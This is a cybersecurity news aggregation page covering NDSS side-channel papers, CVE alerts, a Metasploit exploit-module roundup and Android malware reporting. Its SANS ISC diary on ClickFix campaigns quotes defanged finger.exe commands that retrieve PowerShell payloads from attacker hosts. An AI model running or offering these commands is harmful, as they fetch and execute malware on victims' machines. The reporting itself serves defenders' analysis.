Normal view

Received today — 14 December 2025 — Cybersecurity

Why are companies free to choose their own AI-driven security solutions?

13 December 2025 at 17:00

What Makes AI-Driven Security Solutions Crucial in Modern Cloud Environments? How can organizations navigate the complexities of cybersecurity to ensure robust protection, particularly when dealing with Non-Human Identities (NHIs) in cloud environments? The answer lies in leveraging AI-driven security solutions, offering remarkable freedom of choice and adaptability for cybersecurity professionals. Understanding Non-Human Identities: The Backbone […]

The post Why are companies free to choose their own AI-driven security solutions? appeared first on Entro.

The post Why are companies free to choose their own AI-driven security solutions? appeared first on Security Boulevard.

Can Agentic AI provide solutions that make stakeholders feel assured?

13 December 2025 at 17:00

How Are Non-Human Identities Transforming Cybersecurity Practices? Are you aware of the increasing importance of Non-Human Identities (NHIs)? As organizations transition towards more automated and cloud-based environments, managing NHIs and secrets security becomes vital. These machine identities serve as the backbone for securing sensitive operations across industries like financial services, healthcare, and DevOps environments. Understanding […]

The post Can Agentic AI provide solutions that make stakeholders feel assured? appeared first on Entro.

The post Can Agentic AI provide solutions that make stakeholders feel assured? appeared first on Security Boulevard.

How are secrets scanning technologies getting better?

13 December 2025 at 17:00

How Can Organizations Enhance Their Cloud Security Through Non-Human Identities? Have you ever wondered about the unseen challenges within your cybersecurity framework? Managing Non-Human Identities (NHIs) and their associated secrets has emerged as a vital component in establishing a robust security posture. For organizations operating in the cloud, neglecting to secure machine identities can result […]

The post How are secrets scanning technologies getting better? appeared first on Entro.

The post How are secrets scanning technologies getting better? appeared first on Security Boulevard.

How does NHI support the implementation of least privilege?

13 December 2025 at 17:00

What Are Non-Human Identities and Why Are They Essential for Cybersecurity? Have you ever pondered the complexity of cybersecurity beyond human interactions? Non-Human Identities (NHIs) are becoming a cornerstone in securing digital environments. As the guardians of machine identities, NHIs are pivotal in addressing the security gaps prevalent between research and development teams and security […]

The post How does NHI support the implementation of least privilege? appeared first on Entro.

The post How does NHI support the implementation of least privilege? appeared first on Security Boulevard.

What New Changes Are Coming to FedRAMP in 2026?

12 December 2025 at 17:40

One thing is certain: every year, the cybersecurity threat environment will evolve. AI tools, advances in computing, the growth of high-powered data centers that can be weaponized, compromised IoT networks, and all of the traditional vectors grow and change. As such, the tools and frameworks we use to resist these attacks will also need to […]

The post What New Changes Are Coming to FedRAMP in 2026? appeared first on Security Boulevard.

Received yesterday — 13 December 2025 — Cybersecurity

ClickFix Attacks Still Using the Finger, (Sat, Dec 13th)

13 December 2025 at 14:35

Introduction

Since as early as November 2025, the finger protocol has been used in ClickFix social engineering attacks. BleepingComputer posted a report of this activity on November 15th, and Didier Stevens posted a short follow-up in an ISC diary the next day.

I often investigate two campaigns that employ ClickFix attacks: KongTuke and SmartApeSG. When I checked earlier this week on Thursday, December 11th, both campaigns used commands that ran finger.exe in Windows to retrieve malicious content.

So after nearly a month, ClickFix attacks are still giving us the finger.


Shown above: ClickFix attacks running finger.exe.

KongTuke Example

My investigation of KongTuke activity on December 11th revealed a command for finger gcaptcha@captchaver[.]top from the fake CAPTCHA page.


Shown above: Example of fake CAPTCHA page from the KongTuke campaign on December 11th, 2025.

I recorded network traffic generated by running this ClickFix script, and I used the finger filter in Wireshark to find finger traffic over TCP port 79.


Shown above: Finding finger traffic using the finger filter in Wireshark.

Following the TCP stream of this traffic revealed text returned from the server. The result was a PowerShell command with Base64-encoded text.


Shown above: Text returned from the server in response to the finger command.
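The finger protocol itself is trivially simple: the client opens a TCP connection to port 79, sends a username followed by CRLF, and reads the reply until the server closes the connection. The sketch below emulates that exchange in Python against a local stand-in server (the hypothetical payload and port are illustrative, not the actual attacker infrastructure), and decodes the reply the way PowerShell's `-EncodedCommand` would, i.e., as Base64 of UTF-16LE text:

```python
import base64
import socket
import threading

def finger_query(host: str, user: str, port: int = 79, timeout: float = 5.0) -> bytes:
    """Send a finger request (username + CRLF) and read the full reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(user.encode("ascii") + b"\r\n")
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks)

# --- demo against a local stand-in server with a benign placeholder payload ---
def _fake_finger_server(srv: socket.socket, payload: bytes) -> None:
    conn, _ = srv.accept()
    conn.recv(1024)          # read the requested username
    conn.sendall(payload)    # reply as a malicious finger server would
    conn.close()

# PowerShell's -EncodedCommand expects Base64 of UTF-16LE text
encoded = base64.b64encode("Write-Host 'demo'".encode("utf-16-le"))

srv = socket.socket()
srv.bind(("127.0.0.1", 0))   # ephemeral port instead of 79
srv.listen(1)
threading.Thread(target=_fake_finger_server, args=(srv, encoded), daemon=True).start()

reply = finger_query("127.0.0.1", "gcaptcha", port=srv.getsockname()[1])
decoded = base64.b64decode(reply).decode("utf-16-le")
print(decoded)  # Write-Host 'demo'
```

The UTF-16LE decoding step mirrors why the Base64 blobs returned by these servers look padded with null bytes when viewed raw in a TCP stream.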

SmartApeSG Example

My investigation of SmartApeSG activity on December 11th revealed a command for finger Galo@91.193.19[.]108 from the fake CAPTCHA page.


Shown above: Example of fake CAPTCHA page from the SmartApeSG campaign on December 11th, 2025.

I recorded network traffic generated by running this ClickFix script, and I used the finger filter in Wireshark to find finger traffic over TCP port 79.


Shown above: Finding finger traffic using the finger filter in Wireshark.

Following the TCP stream of this traffic revealed text returned from the server. The result was a script to retrieve content from pmidpils[.]com/yhb.jpg, then save and run that content on the user's Windows host.


Shown above: Text returned from the server in response to the finger command.

Final Words

As Didier Stevens noted in last month's diary about this activity, corporate environments with an explicit proxy will block TCP port 79 traffic generated by finger.exe. However, if TCP port 79 traffic isn't blocked, these attacks could still be effective.
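Defenders can verify whether TCP port 79 egress is actually blocked from a given host. A minimal reachability check is sketched below; the demo runs against a local listener on an ephemeral port, but in practice you would point it at an external host on port 79 to confirm your egress filtering:

```python
import socket

def tcp_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Demo against a local listener; substitute an external host and port 79
# to test whether finger.exe traffic could leave your network.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen(1)
open_port = listener.getsockname()[1]

print(tcp_reachable("127.0.0.1", open_port))  # True (listener accepting)
listener.close()
print(tcp_reachable("127.0.0.1", open_port))  # False (listener closed)
```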

Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

NDSS 2025 – A Systematic Evaluation Of Novel And Existing Cache Side Channels

13 December 2025 at 11:00

Session 5D: Side Channels 1

Authors, Creators & Presenters: Fabian Rauscher (Graz University of Technology), Carina Fiedler (Graz University of Technology), Andreas Kogler (Graz University of Technology), Daniel Gruss (Graz University of Technology)

PAPER
A Systematic Evaluation Of Novel And Existing Cache Side Channels

CPU caches are among the most widely studied side-channel targets, with Prime+Probe and Flush+Reload being the most prominent techniques. These generic cache attack techniques can leak cryptographic keys, user input, and are a building block of many microarchitectural attacks. In this paper, we present the first systematic evaluation using 9 characteristics of the 4 most relevant cache attacks, Flush+Reload, Flush+Flush, Evict+Reload, and Prime+Probe, as well as three new attacks that we introduce: Demote+Reload, Demote+Demote, and DemoteContention. We evaluate hit-miss margins, temporal precision, spatial precision, topological scope, attack time, blind spot length, channel capacity, noise resilience, and detectability on recent Intel microarchitectures. Demote+Reload and Demote+Demote perform similarly to previous attacks and slightly better in some cases, e.g., Demote+Reload has a 60.7 % smaller blind spot than Flush+Reload. With 15.48 Mbit/s, Demote+Reload has a 64.3 % higher channel capacity than Flush+Reload. We also compare all attacks in an AES T-table attack and compare Demote+Reload and Flush+Reload in an inter-keystroke timing attack. Beyond the scope of the prior attack techniques, we demonstrate a KASLR break with Demote+Demote and the amplification of power side-channel leakage with Demote+Reload. Finally, Sapphire Rapids and Emerald Rapids CPUs use a non-inclusive L3 cache, effectively limiting eviction-based cross-core attacks, e.g., Prime+Probe and Evict+Reload, to rare cases where the victim's activity reaches the L3 cache. Hence, we show that in a cross-core attack, DemoteContention can be used as a reliable alternative to Prime+Probe and Evict+Reload that does not require reverse-engineering of addressing functions and cache replacement policy.
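For readers new to this family of attacks, the hit/miss signal that Flush+Reload-style techniques exploit can be illustrated with a toy cache model. This is not the paper's implementation and the cycle costs are invented constants; it only shows why reload latency after a flush reveals whether a victim touched a shared address:

```python
# Toy model of the Flush+Reload signal: reload latency reveals whether a
# shared address was accessed since the attacker last flushed it.
HIT_CYCLES, MISS_CYCLES = 40, 200   # illustrative constants, not measured
THRESHOLD = 100                     # classify reload as hit vs. miss

class ToyCache:
    def __init__(self):
        self.lines = set()          # addresses currently cached
    def access(self, addr) -> int:
        if addr in self.lines:
            return HIT_CYCLES       # cached: fast
        self.lines.add(addr)        # miss fills the line
        return MISS_CYCLES          # uncached: slow
    def flush(self, addr):          # clflush analogue
        self.lines.discard(addr)

def probe(cache: ToyCache, addr, victim_touches: bool) -> bool:
    """One Flush+Reload round: True if the victim's access is detected."""
    cache.flush(addr)               # 1. flush the shared line
    if victim_touches:
        cache.access(addr)          # 2. victim may touch it
    return cache.access(addr) < THRESHOLD  # 3. reload and time

cache = ToyCache()
print(probe(cache, 0xdead, victim_touches=True))   # True  (fast reload: hit)
print(probe(cache, 0xdead, victim_touches=False))  # False (slow reload: miss)
```

The paper's Demote+Reload variant replaces the flush step with a demote operation, but the classify-by-latency structure of each round is the same.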


ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.


Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators', Authors', and Presenters' superb NDSS Symposium 2025 conference content on the organization's YouTube channel.

Permalink

The post NDSS 2025 – A Systematic Evaluation Of Novel And Existing Cache Side Channels appeared first on Security Boulevard.

How do secrets rotations drive innovations in security?

12 December 2025 at 17:00

How Critical is Managing Non-Human Identities for Cloud Security? Are you familiar with the virtual tourists navigating your digital environment right now? These tourists, known as Non-Human Identities (NHIs), are machine identities pivotal in computer security, especially within cloud environments. These NHIs are akin to digital travelers carrying passports and visas—where the passport represents an encrypted […]

The post How do secrets rotations drive innovations in security? appeared first on Entro.

The post How do secrets rotations drive innovations in security? appeared first on Security Boulevard.

How can effective NHIs fit your cybersecurity budget?

12 December 2025 at 17:00

Are Non-Human Identities Key to an Optimal Cybersecurity Budget? Have you ever pondered over the hidden costs of cybersecurity that might be draining your resources without your knowledge? Non-Human Identities (NHIs) and Secrets Security Management are essential components of a cost-effective cybersecurity strategy, especially when organizations increasingly operate in cloud environments. Understanding Non-Human Identities (NHIs) […]

The post How can effective NHIs fit your cybersecurity budget? appeared first on Entro.

The post How can effective NHIs fit your cybersecurity budget? appeared first on Security Boulevard.

What aspects of Agentic AI security should get you excited?

12 December 2025 at 17:00

Are Non-Human Identities the Key to Strengthening Agentic AI Security? In a world increasingly dominated by Agentic AI, organizations are pivoting toward more advanced security paradigms to protect their digital assets. Non-Human Identities (NHI) and Secrets Security Management have emerged as pivotal elements to fortify this quest for heightened cybersecurity. But why should this trend be generating excitement […]

The post What aspects of Agentic AI security should get you excited? appeared first on Entro.

The post What aspects of Agentic AI security should get you excited? appeared first on Security Boulevard.

What are the best practices for ensuring NHIs are protected?

12 December 2025 at 17:00

How Can Organizations Safeguard Non-Human Identities in the Cloud? Are your organization’s machine identities as secure as they should be? As the digital landscape evolves, the protection of Non-Human Identities (NHIs) becomes crucial for maintaining robust cybersecurity postures. NHIs represent machine identities like encrypted passwords, tokens, and keys, which are pivotal in ensuring effective cloud security control. […]

The post What are the best practices for ensuring NHIs are protected? appeared first on Entro.

The post What are the best practices for ensuring NHIs are protected? appeared first on Security Boulevard.

CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks

13 December 2025 at 07:33
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file upload vulnerability that could be exploited to achieve remote code

Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild

13 December 2025 at 00:32
Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched by Google in Chrome earlier this week. The vulnerabilities are listed below - CVE-2025-43529 (CVSS score: N/A) - A use-after-free vulnerability in WebKit

Metasploit Wrap-Up 12/12/2025

12 December 2025 at 15:38

React2shell Module

As you may have heard, on December 3, 2025, the React team announced a critical Remote Code Execution (RCE) vulnerability in servers using the React Server Components (RSC) Flight protocol. The vulnerability, tracked as CVE-2025-55182, carries a CVSS score of 10.0 and is informally known as "React2Shell". It allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with "__proto__", "constructor", or "prototype" as module names. We're happy to announce that community contributor vognik submitted an exploit module for React2Shell which landed earlier this week and is included in this week's release.

MSSQL Improvements

Over the past couple of weeks Metasploit has made a couple of key improvements to the framework’s MSSQL attack capabilities. The first (PR 20637) is a new NTLM relay module, auxiliary/server/relay/smb_to_mssql, which enables users to start a malicious SMB server that will relay authentication attempts to one or more target MSSQL servers. When successful, the Metasploit operator will have an interactive session to the MSSQL server that can be used to run interactive queries, or MSSQL auxiliary modules.

Building on this work, it became clear that users would need to interact with MSSQL servers that require encryption, as many do in hardened environments. To achieve that objective, issue 18745 was closed by updating Metasploit's MSSQL protocol library to offer better encryption support. Now, Metasploit users can open interactive sessions to servers that offer and even require encrypted connections. This functionality is available automatically in the auxiliary/scanner/mssql/mssql_login and new auxiliary/server/relay/smb_to_mssql modules.

New module content (5)

Magento SessionReaper

Authors: Blaklis, Tomais Williamson, and Valentin Lobstein chocapikk@leakix.net 

Type: Exploit

Pull request: #20725 contributed by Chocapikk 

Path: multi/http/magento_sessionreaper

AttackerKB reference: CVE-2025-54236

Description: This adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint.

Unauthenticated RCE in React and Next.js

Authors: Lachlan Davidson, Maksim Rogov, and maple3142

Type: Exploit

Pull request: #20760 contributed by sfewer-r7 

Path: multi/http/react2shell_unauth_rce_cve_2025_55182 

AttackerKB reference: CVE-2025-66478

Description: This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.

WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE

Authors: Peter Thaleikis and Valentin Lobstein chocapikk@leakix.net 

Type: Exploit

Pull request: #20746 contributed by Chocapikk 

Path: multi/http/wp_king_addons_privilege_escalation 

AttackerKB reference: CVE-2025-8489

Description: This adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload.

Linux Reboot

Author: bcoles bcoles@gmail.com 

Type: Payload (Single)

Pull request: #20682 contributed by bcoles 

Path: linux/loongarch64/reboot

Description: This extends our payloads support to a new architecture, LoongArch64. The first payload introduced for this new architecture is the reboot payload, which will cause the target system to restart once triggered.

Enhanced Modules (2)

Modules which have either been enhanced or renamed:

Enhancements and features (1)

  • #20704 from dwelch-r7 - The module auxiliary/scanner/ssh/ssh_login_pubkey has been removed. Its functionality has been moved into auxiliary/scanner/ssh/ssh_login.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Received before yesterday — Cybersecurity

Friday Squid Blogging: Giant Squid Eating a Diamondback Squid

12 December 2025 at 17:00

I have no context for this video—it’s from Reddit—but one of the commenters adds some context:

Hey everyone, squid biologist here! Wanted to add some stuff you might find interesting.

With so many people carrying around cameras, we’re getting more videos of giant squid at the surface than in previous decades. We’re also starting to notice a pattern, that around this time of year (peaking in January) we see a bunch of giant squid around Japan. We don’t know why this is happening. Maybe they gather around there to mate or something? who knows! but since so many people have cameras, those one-off monster-story encounters are now caught on video, like this one (which, btw, rips. This squid looks so healthy, it’s awesome).

When we see big (giant or colossal) healthy squid like this, it’s often because a fisher caught something else (either another squid or sometimes an antarctic toothfish). The squid is attracted to whatever was caught and they hop on the hook and go along for the ride when the target species is reeled in. There are a few colossal squid sightings similar to this from the southern ocean (but fewer people are down there, so fewer cameras, fewer videos). On the original instagram video, a bunch of people are like “Put it back! Release him!” etc, but he’s just enjoying dinner (obviously as the squid swims away at the end).

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

NDSS 2025 – KernelSnitch: Side Channel-Attacks On Kernel Data Structures

12 December 2025 at 15:00

Session 5D: Side Channels 1

Authors, Creators & Presenters: Lukas Maar (Graz University of Technology), Jonas Juffinger (Graz University of Technology), Thomas Steinbauer (Graz University of Technology), Daniel Gruss (Graz University of Technology), Stefan Mangard (Graz University of Technology)

PAPER
KernelSnitch: Side Channel-Attacks On Kernel Data Structures

The sharing of hardware elements, such as caches, is known to introduce microarchitectural side-channel leakage. One approach to eliminate this leakage is to not share hardware elements across security domains. However, even under the assumption of leakage-free hardware, it is unclear whether other critical system components, like the operating system, introduce software-caused side-channel leakage. In this paper, we present a novel generic software side-channel attack, KernelSnitch, targeting kernel data structures such as hash tables and trees. These structures are commonly used to store both kernel and user information, e.g., metadata for userspace locks. KernelSnitch exploits that these data structures are variable in size, ranging from an empty state to a theoretically arbitrary amount of elements. Accessing these structures requires a variable amount of time depending on the number of elements, i.e., the occupancy level. This variance constitutes a timing side channel, observable from user space by an unprivileged, isolated attacker. While the timing differences are very low compared to the syscall runtime, we demonstrate and evaluate methods to amplify these timing differences reliably. In three case studies, we show that KernelSnitch allows unprivileged and isolated attackers to leak sensitive information from the kernel and activities in other processes. First, we demonstrate covert channels with transmission rates up to 580 kbit/s. Second, we perform a kernel heap pointer leak in less than 65 s by exploiting the specific indexing that Linux is using in hash tables. Third, we demonstrate a website fingerprinting attack, achieving an F1 score of more than 89 %, showing that activity in other user programs can be observed using KernelSnitch. Finally, we discuss mitigations for our hardware-agnostic attacks.
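KernelSnitch's core observation, that traversal time grows with a data structure's occupancy, can be illustrated with a toy chained hash table that counts key comparisons instead of measuring wall-clock time. This is a deterministic simplification of the timing channel described in the abstract, not the paper's kernel-level attack:

```python
class ChainedTable:
    """Toy hash table with chaining; counts key comparisons per lookup,
    a deterministic stand-in for the access-time signal."""
    def __init__(self, buckets: int = 8):
        self.buckets = [[] for _ in range(buckets)]
    def insert(self, key, value):
        self.buckets[hash(key) % len(self.buckets)].append((key, value))
    def lookup_cost(self, key) -> int:
        comparisons = 0
        for k, _ in self.buckets[hash(key) % len(self.buckets)]:
            comparisons += 1
            if k == key:
                break
        return comparisons

table = ChainedTable(buckets=1)   # single bucket: occupancy == chain length
empty_cost = table.lookup_cost("probe")   # nothing stored: 0 comparisons
for i in range(50):                       # "victim" activity fills the table
    table.insert(f"item-{i}", i)
full_cost = table.lookup_cost("probe")    # scans the whole chain: 50

# The cost difference leaks how many elements the victim inserted.
print(empty_cost, full_cost)  # 0 50
```

In the real attack the comparison count manifests as syscall latency, which is tiny relative to syscall overhead; hence the paper's emphasis on amplification techniques to make the signal reliably observable from user space.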


ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.


Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators', Authors', and Presenters' superb NDSS Symposium 2025 conference content on the organization's YouTube channel.

Permalink

The post NDSS 2025 – KernelSnitch: Side Channel-Attacks On Kernel Data Structures appeared first on Security Boulevard.

LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle

12 December 2025 at 14:06

Regulators made their move in 2025.

Disclosure deadlines arrived. AI rules took shape. Liability rose up the chain of command. But for security teams on the ground, the distance between policy and practice only grew wider.

Part two of a (more…)

The post LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle first appeared on The Last Watchdog.

The post LW ROUNDTABLE Part 2: Mandates surge, guardrails lag — intel from the messy middle appeared first on Security Boulevard.

Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads

12 December 2025 at 13:50
Cybersecurity researchers are calling attention to a new campaign that's leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. "These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing

New Android Malware Locks Device Screens and Demands a Ransom

12 December 2025 at 15:15

Android malware DroidLock

A new Android malware locks device screens and demands that users pay a ransom to keep their data from being deleted. Dubbed “DroidLock” by Zimperium researchers, the Android ransomware-like malware can also “wipe devices, change PINs, intercept OTPs, and remotely control the user interface, turning an infected phone into a hostile endpoint.” The malware detected by the researchers targeted Spanish Android users via phishing sites. Based on the examples provided, the French telecommunications company Orange S.A. was one of the companies impersonated in the campaign.

Android Malware DroidLock Uses ‘Ransomware-like Overlay’

The researchers detailed the new Android malware in a blog post this week, noting that the malware “has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device.” The malware uses fake system update screens to trick victims and can stream and remotely control devices via virtual network computing (VNC). The malware can also exploit device administrator privileges to “lock or erase data, capture the victim's image with the front camera, and silence the device.” The infection chain starts with a dropper that appears to require the user to change settings to allow unknown apps to be installed from the source (image below), which leads to the secondary payload that contains the malware.

The Android malware DroidLock prompts users for installation permissions (Zimperium)

Once the user grants accessibility permission, “the malware automatically approves additional permissions, such as those for accessing SMS, call logs, contacts, and audio,” the researchers said. The malware requests Device Admin Permission and Accessibility Services Permission at the start of the installation. Those permissions allow the malware to perform malicious actions such as:
  • Wiping data from the device, “effectively performing a factory reset.”
  • Locking the device.
  • Changing the PIN, password or biometric information to prevent user access to the device.
Based on commands received from the threat actor’s command and control (C2) server, “the attacker can compromise the device indefinitely and lock the user out from accessing the device.”

DroidLock Malware Overlays

The DroidLock malware uses Accessibility Services to launch overlays on targeted applications, prompted by an AccessibilityEvent originating from a package on the attacker's target list. The Android malware uses two primary overlay methods:
  • A Lock Pattern overlay that displays a pattern-drawing user interface (UI) to capture device unlock patterns.
  • A WebView overlay that loads attacker-controlled HTML content stored locally in a database; when an application is opened, the malware queries the database for the specific package name, and if a match is found it launches a full-screen WebView overlay that displays the stored HTML.
The malware also uses a deceptive Android update screen that instructs users not to power off or restart their devices. “This technique is commonly used by attackers to prevent user interaction while malicious activities are carried out in the background,” the researchers said.

The malware can also capture all screen activity and transmit it to a remote server by operating as a persistent foreground service and using MediaProjection and VirtualDisplay to capture screen images, which are then converted to a base64-encoded JPEG format and transmitted to the C2 server. “This highly dangerous functionality could facilitate the theft of any sensitive information shown on the device’s display, including credentials, MFA codes, etc.,” the researchers said.

Zimperium has shared its findings with Google, so up-to-date Android devices are protected against the malware, and the company has also published DroidLock Indicators of Compromise (IoCs).
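The screen-capture exfiltration path described above (frame, to JPEG, to base64, to C2) is a common pattern, and recognizing it helps defenders spot the traffic. The sketch below models just the encoding step in Python with placeholder bytes; the `screen_frame`/`data` field names are hypothetical, not DroidLock's actual wire format:

```python
import base64
import json

JPEG_MAGIC = b"\xff\xd8\xff"  # JPEG files start with these bytes

def encode_frame(jpeg_bytes: bytes) -> str:
    """Base64-encode a captured JPEG frame for transmission,
    mirroring the frame -> base64 JPEG -> C2 pipeline described above."""
    if not jpeg_bytes.startswith(JPEG_MAGIC):
        raise ValueError("not a JPEG frame")
    return base64.b64encode(jpeg_bytes).decode("ascii")

# Placeholder frame: JPEG magic plus dummy payload (no real screen data).
frame = JPEG_MAGIC + b"\x00" * 16
body = json.dumps({"type": "screen_frame", "data": encode_frame(frame)})

# A defender inspecting traffic can decode suspected fields and look for
# the same JPEG signature inside base64 blobs:
decoded = base64.b64decode(json.loads(body)["data"])
print(decoded.startswith(JPEG_MAGIC))  # True
```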

What Tech Leaders Need to Know About MCP Authentication in 2025

MCP is transforming AI agent connectivity, but authentication is the critical gap. Learn about Shadow IT risks, enterprise requirements, and solutions.

The post What Tech Leaders Need to Know About MCP Authentication in 2025 appeared first on Security Boulevard.

Building Trustworthy AI Agents

12 December 2025 at 07:00

The promise of personal AI assistants rests on a dangerous assumption: that we can trust systems we haven’t made trustworthy. We can’t. And today’s versions are failing us in predictable ways: pushing us to do things against our own best interests, gaslighting us with doubt about things we are or that we know, and being unable to distinguish between who we are and who we have been. They struggle with incomplete, inaccurate, and partial context: with no standard way to move toward accuracy, no mechanism to correct sources of error, and no accountability when wrong information leads to bad decisions...

The post Building Trustworthy AI Agents appeared first on Security Boulevard.

The US digital doxxing of H-1B applicants is a massive privacy misstep

12 December 2025 at 13:19

Technology professionals hoping to come and work in the US face a new privacy concern. Starting December 15, skilled workers on H-1B visas and their families must flip their social media profiles to public before their consular interviews. It’s a deeply risky move from a security and privacy perspective.

According to a missive from the US State Department, immigration officers use all available information to vet newcomers for signs that they pose a threat to national security. That includes an “online presence review.” That review now requires not just H-1B applicants but also H-4 applicants (their dependents who want to move with them to the US) to “adjust the privacy settings on all of their social media profiles to ‘public.'”

An internal State Department cable obtained by CBS had sharper language: it instructs officers to screen for “any indications of hostility toward the citizens, culture, government, institutions, or founding principles of the United States.” What that means is unclear, but if your friends like posting strong political opinions, you should be worried.

This isn’t the first time that the government has forced people to lift the curtain on their private digital lives. The US State Department forced student visa applicants to make their social media profiles public in June this year.

This is a big deal for a lot of people. The H-1B program allows companies to temporarily hire foreign workers in specialty jobs. The US processed around 400,000 visas under the H-1B program last year, most of which were applications to renew employment, according to the Pew Research Center. When you factor in those workers’ dependents, we’re talking well over a million people. This decision forces them into long-term digital exposure that threatens not just them, but the US too.

Why forced public exposure is a security disaster

A lot of these H-1B workers work for defense contractors, chip makers, AI labs, and big tech companies. These are organizations that foreign powers (especially those hostile to the US) care a lot about, and that makes those H-1B employees primary targets for them.

Making H-1B holders’ real names, faces, and daily routines public is a form of digital doxxing. The policy exposes far more personal information than is safe, creating significant new risks.

This information gives these actors a free organizational chart, complete with up-to-date information on who’s likely to be working on chip designs and sensitive software.

It also gives those same actors all they need to target the people on that chart. They have information on H-1B holders and their dependents, including intelligence about their friends and family, their interests, their regular locations, and even what kinds of technology they use. Those individuals become more exposed to risks like SIM swapping and swatting.

This public information also turns employees into organizational attack vectors. Adversaries can use personal and professional data to enhance spear-phishing and business email compromise techniques that cost organizations dearly. Public social media content becomes training data for fraud, serving up audio and video that threat actors can use to create lifelike impersonations of company employees.

Social media profiles also give adversaries an ideal way to approach people. They have a nasty habit of exploiting social media to target assets for recruitment. The head of MI5 warned two years ago that Chinese state actors had approached an estimated 20,000 Britons via LinkedIn to steal industrial or technological secrets.

Armed with a deep, intimate understanding of what makes their targets tick, attackers stand a much better chance of co-opting them. One person might need money because of a gambling problem or a sick relative. Another might be lonely and a perfect target for a romance scam.

Or how about basic extortion? LGBTQ+ individuals from countries where homosexuality is criminalized risk exposure to regimes that could harm them when they return. Family members in hostile countries become bargaining chips, and in some regions the families of high-value employees face increased exposure the moment this information becomes accessible. Foreign nation states are good at exploiting pain points. This policy means they won't have to look far for them.

Visa applicants might assume they can simply make an account private again once officials have evaluated them. But states adversarial to the US are actively seeking such information. They have vast online surveillance operations that scrape public social media accounts. As soon as they notice someone showing up in the US with H-1B visa status, they'll be ready to mine account data that they've already scraped.

So what is an H-1B applicant to do? Deleting accounts is a bad idea, because sudden disappearance can trigger suspicion and officers may detect forensic traces. A safer approach is to pause new posting and carefully review older content before making profiles public. Removing or hiding posts that reveal personal routines, locations, or sensitive opinions reduces what can be taken out of context or used for targeting once accounts are exposed.

The irony is that spies are likely using fake social media accounts honed for years to slip under the radar. That means they’ll keep operating in the dark while legitimate H-1B applicants are the ones who become vulnerable. So this policy may unintentionally create the very risks it aims to prevent. And it also normalizes mandatory public exposure as a condition of government interaction.

We’re at a crossroads. Today, visa applicants, their families, and their employers are at risk. The infrastructure exists to expand this approach in the future. Or officials could stop now and rethink, before these risks become more deeply entrenched.


We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

EFF and 12 Organizations Urge UK Politicians to Drop Digital ID Scheme Ahead of Parliamentary Petition Debate

13 December 2025 at 06:10

The UK Parliament convened earlier this week to debate a petition signed by 2.9 million people calling for an end to the government’s plans to roll out a national digital ID. Ahead of that debate, EFF and 12 other civil society organizations wrote to politicians in the country urging MPs to reject the Labour government’s newly announced digital ID proposal.

The UK’s Prime Minister Keir Starmer pitched the scheme as a way to “cut the faff” in proving people’s identities by creating a virtual ID on personal devices with information like names, date of birth, nationality, photo, and residency status to verify their right to live and work in the country. 

But the case for digital identification has not been made. 

As we detail in our joint briefing, the proposal follows a troubling global trend: governments introducing expansive digital identity systems that are structurally incompatible with a rights-respecting democracy. The UK’s plan raises six interconnected concerns:

  1. Mission creep
  2. Infringements on privacy rights
  3. Serious security risks
  4. Reliance on inaccurate and unproven technologies
  5. Discrimination and exclusion
  6. The deepening of entrenched power imbalances between the state and the public.

